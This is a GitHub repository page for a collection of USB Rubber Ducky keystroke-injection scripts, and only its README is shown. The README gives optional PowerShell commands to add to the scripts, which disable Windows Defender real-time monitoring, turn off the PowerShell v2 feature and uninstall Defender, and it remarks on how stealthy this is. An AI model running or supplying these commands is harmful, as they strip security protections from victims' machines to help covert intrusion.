Skip to content

random ducky scripts that have been pulled together.

Notifications You must be signed in to change notification settings

coolkingcole/ducky_scripts

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 

Repository files navigation

ducky_scripts

Random ducky scripts that have been pulled together.
--more to be added later.

Delays should be modified if you are running on a slow system or your payload is from a slow server.

optional

Add these to the script to disable powershell v2 engine protections and windows defender realtime protection, This is less stealthy since the user might be warned of windows defender being disabled.

Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
Set-MpPreference -DisableRealtimeMonitoring $true
If you want to uninstall defender completely
Uninstall-WindowsFeature -Name Windows-Defender

About

random ducky scripts that have been pulled together.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published